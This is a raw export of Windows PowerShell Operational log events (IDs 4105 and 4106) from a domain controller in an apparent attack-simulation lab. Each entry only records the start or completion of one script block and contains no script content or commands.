SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468481
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468480
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468479
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468478
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468477
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468476
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468475
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468474
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468473
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468472
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468471
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468470
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468469
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468468
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468467
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468466
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468465
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468464
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468463
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468462
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468461
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468460
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468459
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468458
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468457
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468456
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468455
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468454
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468453
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468452
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468451
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468450
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468449
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468448
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468447
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468446
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468445
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468444
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468443
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468442
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468441
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468440
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468439
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468438
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468437
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468436
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468435
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468434
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468433
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468432
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468431
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468430
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468429
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468428
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1468427
Keywords=None
Message=Completed invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
Runspace ID: c5f1100c-56fc-4347-871f-80d397213539
06/15/2021 05:00:12 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1468426
Keywords=None
Message=Started invocation of ScriptBlock ID: c03e44c5-33a8-41b9-adb5-16495b4dde39
